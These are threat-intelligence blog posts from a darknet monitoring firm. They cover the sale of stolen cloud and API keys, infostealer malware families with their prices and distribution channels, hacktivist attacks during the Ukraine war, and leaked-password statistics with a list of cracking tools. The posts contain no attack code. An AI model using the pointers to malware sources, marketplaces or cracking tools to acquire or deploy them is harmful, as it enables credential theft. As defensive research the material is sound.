Author: DarkOwl Analyst Team

The Darknet Economy of Credential Data: Keys and Tokens

May 26, 2022

In this blog, we review how sensitive, server-side access credential data – such as AWS private/secret keys, Django secret keys, and API tokens – are captured, circulated, and sold across darknet marketplaces and criminal communities.

Darknet Background

The darknet, which is also referred to as the dark web, is a segment of the internet that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit goods and services trade. Adjacent to the darknet is the deep web and instant chat platforms that play an increasing critical role in facilitating this illicit information availability. Pseudo-anonymous discussion forums and vendor marketplaces hosted on the deep web along with Telegram private and public channels provide additional platforms by which threat actors communicate and circulate sensitive and stolen credential data.

There are multiple types of underground criminal communities that are directly involved in the circulation of stolen credential data. The threat actors from these communities are often categorized as:

  1. Initial Access Brokers: specialize in providing direct access to organizational networks to conduct offensive cyber campaigns. Access is offered for sale on darknet malware discussion forums and exploit marketplaces.
  2. Database Brokers: specialize in exfiltration of large datasets from compromised organizations. Databases are traded and sold on darknet marketplaces and Telegram channels.
  3. Nation-State Sponsored / Cyber Criminal Gangs: these groups are intent on conducting cyber operational campaigns in fulfillment of geopolitical or military initiatives, cyber espionage, and/or information operations. Some gangs are also financially motivated and will extort the victim for financial payments once keys have been leverage for access and theft of sensitive data.

There is also the odd and less publicized ‘hacker skid’ or hobbyist hackers that will scour the darkest corners of the Internet for server-side credential data for simply the psychological thrill of the hunt. These threat actors do not have direct intent for monetary gain, nor even probable use, but seek to feed their egos and increase their personal clout by stealing keys and communicating their various levels of illegal access to high-profile criminal groups and hacking enthusiast communities and chat servers.

Critical Credential Data

This blog is focused on server-side credential data for development and cloud-based server assets. Credential data is also referred to as username/email-address and password combinations, which will not be discussed here.

There are several types of “keys” that threat actors are interested in obtaining:

  • Amazon Web Service (AWS) Key Management Service (AWS KMS) Access Keys: ‘poweruser’ and administrator encryption keys for the managing Amazon-hosted services.
  • AWS Identity Access Management (IAM) keys: consist of long-term credentials users will use to sign programmatic requests to AWS Command Line Interface (CLI) or AWS API.
  • Azure Keys & Secrets: Credential data stored inside Azure Key Vault (KV). Data includes database connection strings, account keys, passwords, and JSON Web keys.
  • Django SECRET_KEYs: secret key for a particular Django installation that is used to provide cryptographic signing.
  • Google Key Management System (KMS) Customer Managed Encryption Keys (CMEK): project-id’s and private keys for service accounts on the Google Cloud Platform (GCP)
  • API Keys: keys required for any number of application programming interfaces

Unfortunately, the threat actors do not always delineate types of keys they’ve obtained or are offering. Many times the threat actor simply advertises the platform and the word “key” in the forum post or marketplace advertisement.

Key Compromise

Commercial application developers have been guilty of copying and pasting keys in organizational Github repositories that are publicly accessible via automated web scrapers. Malicious threat actors actively hunt for such keys across software repositories and unprotected s3 buckets and then utilize the keys for malicious campaigns or trade in the darknet. Sometimes such exfiltrated data is stored on transient paste sites prior to distribution, that is captured by DarkOwl.

A recent example of a ‘dump’ of secret server keys is demonstrated in the figure below. These were discovered by simply using DarkOwl’s proximity search to find documents where the words ‘AWS’ and ‘key’ are within two words of each other.

Figure 1: Source DarkOwl Vision

Some threat actors offer zero-days on malware-centric Telegram channels and darknet discussion forums that facilitate the scanning of Gitlab and Github. In early 2021, a user on AIO Crime, using the moniker soapceo, offered a 0day for searching private repositories for AWS keys for $10K USD.

Figure 2: Source DarkOwl Vision

Other malicious actors employ malware, such as information stealers (a.k.a. infostealers) to steal session tokens and keys. Infostealers such as Redline, Jester, and Eternity – often installed onto victim devices via malicious email campaigns – covertly log and exfiltrate sensitive data from the victim’s device to cause additional harm.

According to open-sources, information security researchers have identified similar information stealer malware in the wild, such as TeamTNT_AWS_Stealer that specifically targets virtual/cloud platforms to exfiltrate sensitive AWS keys on Kubernetes and Docker clusters adjacent to the compromised container.

DarkOwl identified malware called Laravel Monster that is advertised as an “all-in-one grabber” that exfiltrates AWS keys “and more” offered on a popular Russian-speaking forum. The malware also includes a built-in AWS checker that validates whether the keys harvested are active and live and could be used to compromise the server.

Figure 3: Source DarkOwl Vision

For reference, in early 2022, we observed another example of a “Git Scanner” malware is included from the exploit forum for $4K USD to $8K USD depending on the features of the software. A YouTube video demonstrating the software is also included in the post.

In April 2022, a user posted an offer on Telegram for something called, “INJECTOR V3” and a hacking guide known as “Amazon AWS SMTP Method 2022.”

It’s unclear what the details of this method entail (as we did not purchase it); however, other chatter on Telegram suggests it “cracks” AWS servers, uses the server to carry out malspam email campaigns, e.g. phishing, and may even harvest data while on the server.

Figure 4: Source DarkOwl Vision

Keys on Offer

DarkOwl has observed sensitive credential data and keys on offer across the darknet and adjacent chat platforms known for facilitating cyber-crime.  Darknet and deep web forums popular for discussing critical credential data, e.g. keys include many of the malware-specific forums such as XSS. Many times the mention is in relation to “how to exploit” what they’ve discovered on the compromised cloud asset, while others are offered “for sale” in the ACCESS section of the embedded marketplace in the forum.

Darknet threat actors utilize Jabber XMPP and Telegram services in conjunction with their accounts on malware discussion forums to communicate directly with their customers and/or provide more detail about their use of malware they’ve developed or are on offer.

Some threat actors have dedicated “public” Telegram channels where services and digital goods are offered for sale. DarkOwl has observed keys for sale on darknet forum threads and Telegram channels. Many offers on Telegram include offers for keys to simply increase their credibility in the space and encourage customers to do business with them.

Figure 5: Source DarkOwl Vision

While many keys are captured via the methods mentioned above, sensitive SDK API keys are often stolen during organizational cybersecurity incidents, and then circulated by groups on the darknet and in Telegram channels. In summer of 2021, the Electronic Arts (EA)’s FIFA software servers were compromised by a cybercriminal gang, and the data is still in circulation.

Figure 6: Source DarkOwl Vision

Sometimes a discovered or stolen key is utilized to access a cloud or platform panel and the threat actor offers the ‘panel’ for sale. In late 2021, a Telegram market, known as “The Grand Exchange” advertised an Azure panel on offer for sale. The advertisement references a deep web marketplace for the vendor.

Figure 7: Source DarkOwl Vision

Many API keys in circulation on the darknet are offered for free. DarkOwl has observed several recent software API keys offered for free on popular commercial-accounts-trading Telegram channels.

In 2020, a Telegram channel user states they have a Binance API key they obtained via information stealer malware.

In March 2021, an initial access brokers advertised sensitive credential data and cloud access AWS “root” keys for a USA company on a popular darknet malware development forum. The keys were on sale for $80K USD and the threat actor included the revenue estimates for the company and AWS bills to justify the cost of the keys in correlation to the potential ransomware extortion values.

Figure 8: Source DarkOwl Vision

DarkOwl has observed API keys for sale on darknet discussion forums and adjacent Telegram live chat platforms. Both Raidforums and its newest reincarnation, Breached Forums have included such offers on their sites. The figure below is an example of Raidforums user on Telegram offering to sell a Coinbase Pro API key for malicious access. How the API key was obtained is unclear.

Figure 9: Source DarkOwl Vision

DarkOwl has observed threat actors offering sell access to “logs on darknet marketplaces, such as Russian and Genesis. Such logs are obtained via stealer malware variants and include session tokens and keys obtained from victim devices.

Databases of stealer logs that may include API tokens and sessions are also offered for sale and trade on deep web forums such as Breached Forums.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.


Pardon Me While I Steal Your Cookies – A Review of Infostealers Sold on the Darknet

May 19, 2022

Overview: Information Stealers (or ‘infostealers’)

In recent months, DarkOwl has observed an increase in the number of posts advertising a specific type of malware known as “information stealers” or simply, ‘infostealers’ by the underground cybercriminal community. Most of the infostealer promotion appears on darknet and deep web malware/hacking forums and are available for sale across many darknet marketplaces.

Information stealers are designed to steal sensitive information from a compromised device. Most information stealers are designed to covertly access the application where data is stored, e.g. internet browser, and gather personal information such as authentication and credential data, crypto wallets, browser session cookies, etc, and remotely transmit the data back to the cybercriminal for conducting additional financially-focused extortion crime.

Infostealers are commonly delivered by social engineering, such as malspam campaigns and phishing emails. Attachments are typically included in the email with a lure, or a legitimate-looking trap encouraging victims to open the attachment and install the malware onto their device. Information stealers are on the rise and promise lucrative business opportunities for cyber criminals.

In this research, our team reviewed some of the most widely proliferated infostealers on offer on the darknet and discovered an elaborate data exfiltration ecosystem, with low-entry cost, providing cybercriminals access to a wealth of personal information without the victim’s knowledge. We also learned many infostealers are offered in alignment with a malware-as-a-service (MaaS) or “stealer-as-a-service” (SaaS) rental model with subscriptions-based access to the malware executables and associated command and control C2 botnets. 

Redline

Redline is one of the most popular, widely recommended, and notorious information stealers available on the market. The first advertisement for Redline appeared in March 2020. Redline can be used for exfiltrating credentials, cryptocurrency wallets, browser information, as well as FTP client application data. The stealer also collects information about the victim device, including OS, system hardware, processes, and system language.

According to OSINT security researchers, the stealer can load remote payloads in addition to the SOAP protocol for covert C2 communication. Recent versions of Redline leverage SOAP, or Simple Objects Access Protocol over NET.TCP which helps obfuscate the communication data shared between the victim and the C2 servers. SOAP also facilitates smaller packet sizes, which translates to a smaller malware footprint.

Redline is available on darknet marketplaces like DarkFox for as little as $150 USD for the “lite” version, $200 USD for an advertised “pro” version, or $100 USD for a monthly subscription with restricted access.  Other marketplace offers indicate that the Redline team advertise various versions and configurations of their infostealer to support varying levels of threat actor sophistication.

The malware is written in C# and uses a SOAP API to communicate with its C2. Attackers are contacted on Telegram and then can use the C2 panel installed on the victims’ device to use Redline. Redline source code is available on Github with 142 lines of code and built-in commands. (Source: Available Upon Request)

Figure 1: Offer for Redline Stealer for sale on Darkfox Darknet Marketplace

Racoon

According to open sources, Raccoon Stealer, a.k.a Racelar, was first offered for sale in April 2019 and associated with a Telgram user @gr33nl1ght. The Racoon stealer exfiltrates victim login credentials, credit card information, cryptocurrency wallets and browser information. It can also download and execute arbitrary files by command from the C2, operated from Telegram.

DarkOwl has observed advertisements in the darknet for Raccoon offered under the malware-as-a-service model for $75 USD a week or $200 USD per month. Some advertisements on Telegram decrease with longer commitment, e.g. $500 for two months and $499 for four months. The Raccoon stealer executables are available on Github and the source code has been archived in Pastebin.

Despite the success of their operations, in March, the Raccon stealer group announced on a darknet forum they would be suspending operations due to the war in Ukraine and critical team members who are no longer available for key operations.

Figure 2: Raccoonstealer Representative Announcement of Shutdown due to Ukraine-Russia War

Vidar

According to analysts with Cyble, Vidar, also sold as Vidar PRO stealer, was first identified back in 2018. This infostealer variant steals sensitive information such as passwords, banking information, IP addresses, browser history, login credentials and crypto wallets which are sent back to threat actors’ command and control.

The stealer is widely advertised on Telegram and a DarkOwl Vision document captures a Vidar offer on Telegram for $500 USD, but prices on average range from $250 USD to $750 USD for the stealer malware. (Source: DarkOwl Vision)

Vidar is written in C++, and employs Mastadon servers for command and control. An interesting and in-depth analysis of the stealer code can be found on Github details how its stealer infrastructure operates. (Source Redacted but Available Upon Request)

Predator the Thief

Predator the Thief was first offered for sale on a Russian Darknet Forum on June 17, 2018 by a user known as Alexuiop1337. Predator the Thief is more comprehensive than a browser stealer alone and is able to take screenshots of the victim’s desktop in addition to typical exfiltration of credentials, payment data, crypto wallet information stored in the victim’s internet browsers. (Source)

The malware also includes anti-debug techniques, advanced evasion, and anti-analysis tricks for additional sophistication. It is still widely circulated and updated regularly. A Github repository containing the infostealer’s 332 lines of code is still maintained by a user with the same alias as the original post from 2018. (Source Redacted, but Available Upon Request)

The listing is currently offered on darknet forums as well as Telegram channels. The stealer sells for $150 USD, with an option of paying $100 more for the Clipper module allowing buyers to customize crypto wallet stealing options.

Mars

Mars stealer is the most recent version of OSKI stealer and was first seen circulating around July 2021 on a Russian darknet forum. (Source)

During our analysis, we also discovered Instructions for building the Mars’ stealer panel and using the “builder” are available across numerous darknet forums including how to turn off the exclusion for the stealer working in Commonwealth of Independent States (CIS) designated countries. This infostealer is advertised for $160 to $200 USD and is continually under development and improvement complicating Yara rule creation and AV detection.

In early May, users on a darknet forum began circulating a cracked version of the software for use by the community. Many of the forum users warn against using ‘cracked’ versions of the software as there is higher risk of backdoors. We observed that a prominent MarsTeam account which shared some of the original advertisements for the Mars stealer on one popular darknet forum is banned and tagged as a scammer. The ban brings into question the stealer’s legitimacy.

Figure 3: Original post about the Mars Stealer whose Representative has since been banned

Regardless, a GitHub repository containing code for the Mars Stealer is owned by a developer with an impressive collection of various malicious software and other stealers in their repositories, including Loki and Oski stealer as well as Redline. The current version of Mars stealer is using Google Ads to put cloned OpenOffice sites high on search results.

Blackguard

According to open sources, Blackguard first appeared in Russian forums in January 2020 and was advertised “for testing purposes.” The infostealer spent a year circulation before it was advertised for commercial use in 2021. Blackguard steals web browser data like extensions, cryptocurrency wallets, email, messengers, and other sensitive device information that can identify the victim.

Blackguard is sold as a malware-as-service where stolen information is archived into a zip file which is sent back to the C2 server. The source code is developed in .NET and is access is available for $200 USD a month or $700 for a lifetime subscription. (Source)

Acquisition of the stealer is generally limited to exchange with the malware’s representatives directly Telegram and Jabber.

Despite its popularity among cybercriminals and the existence of a cracked version recently in circulation, some dark web forums users are not impressed with this information stealer nor its price tag. Some users recently nominated the Blackguard stealer for the “worst stealer 2020-2022 award” and warn others from using this stealer for legitimate malicious cyber campaigns.

Figure 4: Forum post criticizing Blackguard stealer malware
[Figure Translated]
“The sold software, which is a shame to call a stealer, has already been said a lot. He can officially be nominated for the “Worst Stealer 2020-2022” award Crack taken from the forum where the initial review was posted. It is worth noting that this crack is given “as is”, without fixing holes in the panel. It is categorically not recommended to use it for combat purposes.There is also information that the stealer was so buggy that it fell with exceptions during the crack tests (for example, when getting the av name installed on the machine). These bugs have been fixed by the reverser!”

In other darknet threads, forum users stated that the Blackguard information stealer is “trash”, replete with errors, and requires too much overhead – in the form of persons to operate, especially for the $700 USD price.

Figure 5: Forum post criticizing Blackguard’s lifetime subscription prices
[FIGURE TRANSLATED]
“AHAHAHAHAHAHAHAHAH, $700 sounds more like a rofl than the real price…” That all in all sounds like a big rofl. The author of this software supports the AUE culture and listens to Nurminsky. And now, comrades, answer me one question: how did we come to this. AUE coder. It is 2022. Is this what we deserve?”

The criticisms caused quite a controversy with the stealer representative on the forum confronting many users directly and suggesting they take it up with the moderators in Arbitration.

Jester

Jester is an information stealer that Cyble first noticed in darknet forums in July 2021. It targets the victim’s browser cookies, credentials, email clients, instant messaging applications, crypto wallets, gaming software, VPN and FTP client application data. (Source)

Advertisements on a darknet forum advertise that the stealer-C2 connection is encrypted using the AES-CBC-256 algorithm, with servers located in the tor network, all logs will be redirected to the user’s Telegram bot, and collection occurs in memory instead of on disk to evade detection. Jester is available on RuTor with links to pastebin sites explaining what the stealer does and how much it costs in different languages. The “Builder Jester” malware-as-a-service offering is priced based on length of subscription with $99 USD per month and two “forever” options for $250 USD and another for $999 USD.

Cyble suggested a Github owned by user L1ghtM4n linked to the Jester malware, but further investigation shows that user is linked to a repository called DynamicStealer. DarkOwl has not been able to confirm if the two malware source codes are affiliated; however, some very recent reporting suggests that Jester might be affiliated with the Eternity malware family.

Users promoting Eternity deny the connection, but flaunt that Eternity offers not only a cookie stealer, but a cryptocurrency malware variant, a cryptocurrency address clipboard “clipper”, a DDoS botnet, Worm and Dropper system, as well as a ransomware variant. A new Eternity stealer Tor service claims they successfully exfiltrate a considerable amount of information from the victim including Signal contacts and password manager data on the device like LastPass. 

Figure 6: Eternity stealer promotional information provided by the threat actor

Taurus

Taurus Stealer, also referred to as Taurus project is an information stealer that has been observed promoted by the authors of the Predator the Thief on Russian chat forums in early April 2020. It can steal VPN, social media, credentials, cookies, autofill forms, popular cryptocurrency wallets, and the history of Chromium and Gecko based browsers. It collects information on installer software installation and system configuration, sending it back to the attacker to be used for further lateral exploits across the compromised machine.

Like Mars Stealer, the source code will not execute on victims located in the CIS region, suggesting the authors are likely located in the Russia Federation.

A lifetime license to Taurus is available for $100 USD and can be customized for as little as $20 USD extra. One advertisement we observed on Telegram offered a 10% discount on license cost and the first update is available for free.

Both Taurus and Predator the Thief use BitsTransfer in their PowerShell commands; Bits Transfer is short for “Background Intelligent Transfer Service”, part of Microsoft’s Operating System, and is a way for programs to ask Windows to download or upload files from a remote HTTP or SMB file server.

Taurus links to download malicious GitHub repositories whereas Predator The Thief PowerShell works with LNK files after the stealer has sent the log. When BitsTransfer is executed in Taurus, it downloads three separate files from the Taurus Project on Github owned by andrewwilm. Github has since removed the repository.

In late December, the source for Taurus stealer + its builder, were leaked on a popular darknet forum. Earlier this week, a darknet user offered multiple software iterations of both Predator the Thief and Taurus for $4K USD in Monero cryptocurrency – stating the code was “straight from the author’s hands.” This implies that both Predator the Thief and Taurus stealers were most likely coded originally by the same person.

Figure 7: Offer of source code for sale for Predator the Thief and Taurus stealer software
[Figure Translated]
“The original source code of the two projects.
Predator: 3 versions (2.3.1/3.0.1/3.3.4 ) + clipper model. The panel is not included.
Taurus 4 versions (1.2/1.3/1.4/1.5). Included panel (frontend vue.js, backend golang), telegram bot builder (golang).
Projects are sold as is, without support and updates. Straight from the author’s hands.
The price for all 4k is $XMR only. We can conduct the transaction through the guarantor of this forum.”

Other Information Stealers

While the stealers mentioned above are the most widely circulated and discussed across the information security community and cybercriminals, we also found other less known stealers that are currently active in the underground.

Ginzo

In late April, we found an “as-is” version of source code for a stealer known as “Ginzo” available to download from a popular third-party anonymous data repository. The Ginzo stealer targets Telegram session data when loaded on a victim’s device, along with Internet browser cookie data, desktop files, cryptocurrency wallet data, and Discord tokens.

Open-source reporting suggests that offering the stealer for free to download is a ploy to gain reputation and “get criminals hooked” on using Ginzo’s threat actors command and control servers.

[TRANSLATION]
“Taken in the vastness of the cart, laid out as is. DLL keys that are thrown with the panel have not been checked.”
Figure 8: Source code for Ginzo stealer offered for download

Grim

Another controversial stealer, called “Grim stealer” hosts its own deep web vendor shop and market offering their stealer for sale. The site claims there is a Telegram scammer which is causing the controversy on darknet forums as they are using the malware team’s logo and pulling a classic case of ‘alias hijacking’ to discredit the stealer’s reputation.

Like Eternity, the Grim shop offers their Grim Noid stealer for $110 USD as well as other products such as: a stealer builder for $60 USD, cryptocurrency clipboard “clipper” for $50 USD, a remote access trojan (RAT) for $100 USD, and botnets for the Surface Web and Telegram for $300 USD.

The technical specifications advertised are consistent with other infostealers on the market.

Figure 9: Grim Noid Stealer offered for sale

The market for information stealers is booming on the darknet, with stealer software variants readily available offering high volume data exfiltration, a relatively low-entry cost, and reliable C2 botnet support.

All the stealer families we reviewed advertise a supportive criminal ecosystem, providing cybercriminals steady access to a wealth of digital tokens and personal information that can be abused for subsequent fraud, digital identity theft, and potentially catastrophic critical infrastructure and supply chain attacks.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use-case.

Ukraine’s Call for Help Results in Global Cyberwar: Reviewing the Fallout

May 13, 2022

On the 24th of February, after months of failed diplomacy, the existing geopolitical landscape of Russia, Ukraine, NATO, the EU, China, and the myriad of complex international relationships drastically changed. Thousands of Russian troops and equipment crossed over into Ukraine’s sovereign territory and missile strikes of critical infrastructure and historical landmarks sent its people deep into bunkers underneath the cities, while other took up arms to defend their country.

While the kinetic war waged in the physical realm, Ukraine’s Ministry of Digital Transformation turned to the digital realm for assistance.  Within days of the invasion, a call across underground forums and chatrooms was placed and hundreds of thousands of volunteers – many who identify with the Anonymous hacktivist collective – answered.

Ukraine’s call for help sparked off the first ever global cyberwar.

Weeks before tanks and soldiers marched on the cities of Ukraine, Russia had already carried out a series of successful cyberattacks against Ukraine, hitting critical infrastructure and financial institutions around the country with at least six unique strains of destructive wiper malware. DarkOwl observed data exfiltrated during some of those attacks surface in the darknet, such as the Free Civilian service on Tor where hundreds of gigabytes of Ukrainian citizens sensitive personal data appeared. Recent reporting confirms Russia’s GRU also carried out a massive cyberattack against Viasat, knocking its customers’ KA-SAT satellite broadband offline an hour before the invasion.

Russia’s pre-invasion attacks against Ukraine pale in comparison to the retaliative cyberattacks launched against Russia by the international hacktivist community over the last 77 days. Since the invasion began, thousands of hacktivists, cybersecurity researchers, pen-testers, and ‘greyhats’ are actively participating in daily campaigns to disrupt Russia’s military offensive and influence the perceptions of the Russian people trapped behind the walls of the iron curtain.

Cyber Warriors Use Their Keyboards and Phones as Weapons in Global Cyberwar

Ukraine’s Ministry of Digital Transformation has played a large roll in mobilizing calls to arms from a digital perspective. The IT Army of Ukraine – a digital army of over 275,000 volunteers that was tasked by The Ministry – targets Russian websites every day for widespread distributed denial of service (DDoS) attacks. The Ministry also coordinated directly with SpaceX on acquiring thousands of Starlink terminals for redundant satellite Internet access and spearheaded public calls to international business leaders and retail suppliers to withdraw from operating in Russia.

Hacktivist cyber cells aligned with the Anonymous collective and pro-Ukrainian criminal cyber threat actors conducted hundreds of direct information operations campaigns against Russia using any and every exploit in their arsenal. To this day, the attacks continue relentlessly despite Russia’s attempts to use geo-fencing and Cloudflare services.

Within the first week of the war, we witnessed credentials for numerous critical Russian government ministries leaked on the deep web; the names, phone numbers and personal assets of Russian oligarchy released to the public; names, passports, and dates of birth for over 120,000 Russian soldiers deployed in Ukraine; internal documentation for Russia’s Police Force, Ministries of Foreign Affairs, and Economy leaked.

Darknet criminal communities split over their national alliances. Pro-Russian ransomware groups watched their affiliates abandon their programs and turn on them. We witnessed multiple groups have the internal documentation, source code, and private chats leaked. Several Tor forums and vendor markets hosted in Russia faced persecution through direct cyberattacks, database leaks, and deanonymization of IP addresses.

Propaganda as a Weapon

In any cyberwar, information is power. Knowing that Moscow would try to frame the war as a justified and a defensive strategic military operation, Anonymous worked immediately to identify facts and combat misinformationn. Videos of the attacks against civilian buildings went viral on social media, YouTube, and Discord. Russian television, radio, streaming services were illegally accessed to share images from Ukraine. Anonymous security specialists from Poland known simply as squad303 spun up their 1920.in service – named after a famous RAF squadron involved in WW2’s Battle of Britain – which allowed strangers to contact to a random Russian citizen via SMS, email, Whatsapp, and Viber using leaked lists of millions of Russian citizens’ personal contact information and social media.

As of the first week in May, the squad303 team announced that over 100 million direct messages had been sent using their service.

Figure 1: Screenshot of squad303’s Russian Citizen Phone Number Contact Service

The Kremlin responded by tightening their control on the public media narrative, shutting down social media platforms like Twitter, Instagram, and Facebook, officially calling their war a “special military operation” and using militarized riot police to enforce a strict ban on all forms of public protest of the invasion.

Western media and independent news sources have been threatened with journalists facing a potential 15-year prison sentence for reporting anything that countered Putin’s narrative of “denazification of Ukraine” and “freeing” its people from imminent nuclear threat from the US and NATO. Russian propaganda outlets began recirculating false claims of US-sponsored bioweapon laboratories and nuclear weapon storage facilities across Ukraine to justify the invasion.

Since the invasion, the Russian Internet Research Agency (IRA)-backed ‘troll army’ is in full force with thousands of bot accounts active across Twitter, Facebook, Discord, and Telegram spinning a different story on the ground in Ukraine. The accounts disseminate elaborate storylines of Ukraine shelling their own citizens and supporting fake videos and doctored media.

QAnon and Russian Disinformation

Deep web and darknet imageboards (or “chans”), historically supportive of the QAnon movement and home of the most outrageous conspiracy theories ever told, have also been supportive of Putin touting his critical international role – like that of former President Trump’s – in ridding the world of its secret Cabal and the greedy desires of the New World Order.

According to research shared by Bellingcat, posts on the imageboards in early March stated Russia capturing Ukraine’s Chernobyl plant was critical to stopping everything “from DNA experiments, adrenochrome, torture, childsex and rape facilities, cloning installations and much more.” Ironically, QAnon Russia – with one of the largest QAnon follower base at over 90,000 users – has a dissenting opinion and refuses to share the propaganda, but instead promotes peace in Ukraine, and a united brotherhood across all nations in the region including Belarus, Russia, and Ukraine.  

Anonymous retaliated against these coordinated disinformation efforts by hacking Russia’s Roskozmador information and propaganda agency and its All-Russian State Television and Radio Broadcasting Company (VGTRK) and leaked over 900,000 emails and 360,000 files from across the organizations which detail how television and radio are tightly regulated and programs censored directly by the Kremlin.

In anticipation for Russian propaganda expected to be broadcast on Victory Day on May 9th, Anonymous successfully compromised Russian state television changing nearly every television description during Victory Day ceremonies to read:

“The blood of thousands of Ukrainians and hundreds of their murdered children is on your hands. TV and authorities are lying. No to war.”
Figure 2: Television Program Description from Russian State TV Programming Hack (Source: Anonymous)

Virtual private network (VPN) use in Russia has skyrocketed increasing over 3,000% since mid-February. According to open sources, at least some percentage of curious Russian citizens are bypassing censorship by using VPNs to access international news about Ukraine and social media platforms. As of this week, reports estimated an average of 300,000 downloads of VPN applications occurred every day. 

The first fallout in the darknet from the cyberwar was direct attacks against the CONTI ransomware gang shortly after they publicly declared their support for Russia’s invasion. A Ukrainian-based ‘security researcher’ took to Twitter to leak CONTI’s ransomware source code, details of their internal operations, botnet infrastructure, along with private jabber chats and PII from members of the team.

Similar leaks followed for members of the FSB-backed Trickbot group including dossiers of their members.

Several darknet forums, marketplaces, and XMPP chat servers were taken offline, and information leaked in a digital public shaming for each group’s association with Russia.

In March, Kelvinsecurity exploited a simple IDOR vulnerability on the darknet site: DATABASE Market and leaked the contents of the market’s SQL database and deanonymized the server publishing the IP address of their host located in St. Petersburg.

Earlier this month, member of Anonymous known as v0g3lsec hacked a Russian-linked darknet vendor shop and replaced the site’s content with a description of squad303’s information service and link to their surface website.

Figure 3: Tor Service Defacement by v0g3lsec

Network Battalion (nb65) successfully deployed CONTI’s leaked ransomware source code with a modified cipher and has carried out over half a dozen or more attacks against targets across Russia. Their most recent attack involved Qiwi Кошелек Russian payment system, with over 149,000 kiosks and terminals around the country. Earlier this week, the group shared a database containing over 7 million unique credit card numbers and associated PII for Qiwi platform users in Russia.

Critical Infrastructure Attacks

We have not observed a mass disruption of Russia’s critical infrastructure such as gas, power, and water supplies. This is likely because like the US, such systems decentralized and distributed across various districts across the country. However, some limited interruption has been observed during the conflict. In early March, Cyber Partisans utilized industrial control system (ICS) attacks to shutdown trainlines supplying the Russia military in Belarus. Automated ticketing stations were knocked offline and forced the transportation authorities to issue paper tickets causing delays.

Oil and gas related entities in Russia such as: Gazprom Linde, MashOil, Neocom Geoservice, Enerpred, Aerogas, and Technotec have all suffered cyberattacks resulting in thousands of internal Microsoft Exchange email data leaks in the deep web. In late April multiple explosions occurred resulting in catastrophic fires and injuries at Druzhba oil depot. Subsequent open-source reports on Telegram suggest that the explosions at the Transneft-Druzhba Oil Depot supplier for military units were ‘delivered with the help of drones’ from Ukraine. The depot and associated pipeline is the main route for getting Russian oil into its European customers, although EU leaders have signaled a plan to stop purchasing oil from Russia by the end of the year which may lead to a full embargo across the continent.

In recent weeks, several other mysterious fires across the country have been reported including an ammunition depot in Staraya, another ammunition plant in the Russian town of Perm, an Aviation school in the same village of Perm, a government building in Korolev, a chemical plant near the border of Ukraine, an oil depot in Belgorod, a defense research center in Tver, a pro-Kremlin publishing house in Moscow, a storage hangar in the Bogorodskoe district, and oil tanks were set fire in the industrial zone of Nizhny Novgorod.

Another random fire also started in Belgorod less than two days ago. Reports have not specified where the fire originated specifically.

Figure 4: Recent Explosions in Belgorod Captured by Social Media Users (Source: VK)

It is unclear from reporting whether these explosions were a result of SCADA cyberattacks or direct arson and sabotage by Russian locals sympathetic with the situation in Ukraine. The darknet threat group GhostSec recently compromised Russia’s Metrospetstekhnika ASOTP system for transportation and successfully caused dozens of trains connected to the system to cease operation. The group claims they were able to access and disrupt the internal temperature, smoke, and backup battery systems for any of the trains connected to the network.

Figure 5: Announcement of Metro Train Attack by GhostSec (Source: Telegram)

Anonymous Leaks Stolen Data

Within days of the invasion, targeting and exfiltrated data from targets across Russia surfaced in the deep web. DarkOwl has been monitoring mentions and announcements of data leaked in relation to the since the start of the cyberwar and found hundreds of leaks related to numerous government and commercial industrial sectors across Russia, Belarus, and China. The chart below demonstrates the volume of unique URLs observed containing information related to the war. In the early days, much of the leaked information contained network reconnaissance information (IP addresses, domains, credentials) for carrying out attacks against critical targets, and PII for government, military, and citizens of Russia.

As the war progressed, stolen data of all kinds, e.g. intellectual property, design schematics, military plans, financial account data, and emails appeared. While in recent weeks the number of unique leaks are fewer, the contents contained therein are higher volume and significant in value. For example, over the last two weeks, Anonymous has released – via DDoSecrets – over 3TB of data archives containing thousands of emails and sensitive internal documents from victim organizations across Russia.

Figure 7: Distribution of Data Leaks from the Cyberwar by Industry Sector

Nearly 90% of the leaks DarkOwl has observed are related to targets in Russia. The figure below is a distribution of the non-Russian countries information that has surfaced, with direct mention of the cyberwar. The threat actor group, AgainstTheWest (ATW) concentrated on technology, government, and financial targets across China in the weeks following the invasion. ATW has since stopped participating in the campaign.

Figure 8: Percentage of non-Russian Data Leaked with Direct Mention of Global Cyberwar

Russia’s Response Takes Many Forms

Readers should not be fooled into thinking that this data means that Russia is sitting back idly during these attacks. In addition to the crippling Viasat attack the day of the invasion and widespread propaganda dissemination, GRU-affiliated cyber actors have regularly attacked Ukrainian telecommunications and critical infrastructure alongside its ground-based offensives. Elon Musk also recently stated that Starlink satellites in use by the Ukrainian government for Internet broadband access is under frequent targeted signal jamming by Russian-linked hackers.

State-sponsored malicious cyber actors, ransomware and affiliated extortion groups linked to Moscow continue to spray US and western European companies with widespread spear-phishing attacks and malware deployment. During our recent review, we estimate ransomware gangs successfully encrypt on average a dozen organizations per day.

DarkOwl will continue to monitor the darknet and deep web for critical information pertaining to the quickly evolving cyber landscape.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.

Distribution of Passwords

All Your Passwords Belong to Us

May 05, 2022

In honor of World Password Day – a date established in 2013 by Intel Corporation to foster security awareness – the content team at DarkOwl decided to compile some interesting statistics based on the email and password entities available in the DarkOwl Entity API.

DarkOwl’s Entity Volume

Every day we hear of another commercial data or app breach. At this point, everyone can assume their email address and/or password has been leaked on the darknet or deep web. DarkOwl has collected and tokenized over 8.68 billion (with a “B”) email addresses. 5.46 billion of those emails include a password. 57% of those email addresses include a ‘plaintext’ or legible password.

But My Password is Complex!

If you’re still using your cat’s name followed by the exclamation point (“Fritzie!”), your password is not complex, and you have most likely already experienced an account compromise. But, you’re not alone. Complex, lengthy passwords are not the norm across DarkOwl’s data.

The most common password length is 8 characters.

Password Length
Figure 1: Distribution of Password Volume by Password Character Length

Is an 8-character length password strong enough?

The strength of an 8-character password depends on the motivation and the tools available to the cybercriminal targeting your account. There are plenty of password ‘cracking’ tools readily available to hackers to conducting dictionary and brute force style password attacks. Some of the most popular tools include:

  • John the Ripper
  • Cain & Abel
  • OphCrack
  • THC Hydra
  • Hashcat
  • Brutus
  • RainbowCrack
  • CrackStation

